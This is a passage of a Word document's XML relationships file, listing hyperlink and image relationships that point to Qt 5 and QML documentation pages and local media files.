Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-anchors.html" TargetMode="External"/><Relationship Id="rId2593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-double.html" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-busyindicator.html" TargetMode="External"/><Relationship Id="rId1195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpurchasing-product.html" TargetMode="External"/><Relationship Id="rId2039" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-simplematerial-example.html" TargetMode="External"/><Relationship Id="rId2246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId2453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-scriptaction.html" TargetMode="External"/><Relationship Id="rId2660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsqltablemodel.html" TargetMode="External"/><Relationship Id="rId2898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-locale.html" TargetMode="External"/><Relationship Id="rId1262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-scissortest.html" TargetMode="External"/><Relationship Id="rId2106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgrendererinterface.html" TargetMode="External"/><Relationship Id="rId2313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/edge1.png" TargetMode="External"/><Relationship Id="rId2520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/spritecutting.png" TargetMode="External"/><Relationship Id="rId2758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-usecase-styling.html" TargetMode="External"/><Relationship Id="rId937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-fontmetrics.html" TargetMode="External"/><Relationship Id="rId1122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId1567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId1774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterial.html" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-string.html" TargetMode="External"/><Relationship Id="rId1427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-vector2d.html" TargetMode="External"/><Relationship Id="rId1634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId1939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qttest-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId2170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId3014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/debug.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-candlestickseries.html" TargetMode="External"/><Relationship Id="rId1077" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-material.html" TargetMode="External"/><Relationship Id="rId2030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-textureinthread-example.html" TargetMode="External"/><Relationship Id="rId2128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId2682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-timer.html" TargetMode="External"/><Relationship Id="rId2987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtmultimedia-index.html" TargetMode="External"/><Relationship Id="rId654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpositioning-coordinateanimation.html" TargetMode="External"/><Relationship Id="rId959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gradient.html" TargetMode="External"/><Relationship Id="rId1284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-shiftkey.html" TargetMode="External"/><Relationship Id="rId1491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-localstorage-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/anchor_ordering_bad.png" TargetMode="External"/><Relationship Id="rId2542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-ambienttemperaturesensor.html" TargetMode="External"/><Relationship Id="rId1144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-path.html" TargetMode="External"/><Relationship Id="rId1351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-tableview.html" TargetMode="External"/><Relationship Id="rId1449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webengine.html" TargetMode="External"/><Relationship Id="rId1796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-dialog.html" TargetMode="External"/><Relationship Id="rId2402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xanimator.html" TargetMode="External"/><Relationship Id="rId2847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtextureprovider.html" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-chartview.html" TargetMode="External"/><Relationship Id="rId1004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-intvalidator.html" TargetMode="External"/><Relationship Id="rId1211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-quaternion.html" TargetMode="External"/><Relationship Id="rId1656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-cumulativedirection.html" TargetMode="External"/><Relationship Id="rId2707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-dynamicobjectcreation.html" TargetMode="External"/><Relationship Id="rId2914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId1309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-spritesequence.html" TargetMode="External"/><Relationship Id="rId1516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-binding.html" TargetMode="External"/><Relationship Id="rId1723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qtquicktest.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flickable.html" TargetMode="External"/><Relationship Id="rId3036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId2052" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visualcanvas_list.png" TargetMode="External"/><Relationship Id="rId2497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-scriptaction.html" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-dial.html" TargetMode="External"/><Relationship Id="rId1099" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-modekey.html" TargetMode="External"/><Relationship Id="rId2357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flow.html" TargetMode="External"/><Relationship Id="rId2564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-index.html" TargetMode="External"/><Relationship Id="rId1166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-piemenu.html" TargetMode="External"/><Relationship Id="rId1373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-textureimage.html" TargetMode="External"/><Relationship Id="rId2217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-audiosample.html" TargetMode="External"/><Relationship Id="rId950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-geocircle.html" TargetMode="External"/><Relationship Id="rId1026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-keyboardlayoutloader.html" TargetMode="External"/><Relationship Id="rId1580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlapplications.html" TargetMode="External"/><Relationship Id="rId1678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-overview.html" TargetMode="External"/><Relationship Id="rId1885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId2424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId2936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-fastblur.html" TargetMode="External"/><Relationship Id="rId810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-canvasgradient.html" TargetMode="External"/><Relationship Id="rId908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-effect.html" TargetMode="External"/><Relationship Id="rId1233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-rendersettings.html" TargetMode="External"/><Relationship Id="rId1440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-vxymodelmapper.html" TargetMode="External"/><Relationship Id="rId1538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-spinbox.html" TargetMode="External"/><Relationship Id="rId1745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-expressions.html" TargetMode="External"/><Relationship Id="rId1605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId1812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt-labs-settings-qmlmodule.html" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-fontloader.html" TargetMode="External"/><Relationship Id="rId2074" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridview.html" TargetMode="External"/><Relationship Id="rId2281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-abstractbutton.html" TargetMode="External"/><Relationship Id="rId1090" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-menuitem.html" TargetMode="External"/><Relationship Id="rId2141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId2379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId2586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId2793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlextensionplugin.html" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-borderimage.html" TargetMode="External"/><Relationship Id="rId972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-gyroscopereading.html" TargetMode="External"/><Relationship Id="rId1188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-polygonoffset.html" TargetMode="External"/><Relationship Id="rId1395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-torusmesh.html" TargetMode="External"/><Relationship Id="rId2001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplerectnode.html" TargetMode="External"/><Relationship Id="rId2239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keynavigation.html" TargetMode="External"/><Relationship Id="rId2446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId2653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId2860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-anchors.html" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-colordialog.html" TargetMode="External"/><Relationship Id="rId1048" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-lineseries.html" TargetMode="External"/><Relationship Id="rId1255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-scaleanimator.html" TargetMode="External"/><Relationship Id="rId1462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebsockets-websocket.html" TargetMode="External"/><Relationship Id="rId2306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId1115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-core-nodeinstantiator.html" TargetMode="External"/><Relationship Id="rId1322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtscxml-statemachineloader.html" TargetMode="External"/><Relationship Id="rId1767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgabstractrenderer.html" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId2096" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId1901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-tutorials-extending-qml-example.html" TargetMode="External"/><Relationship Id="rId482" 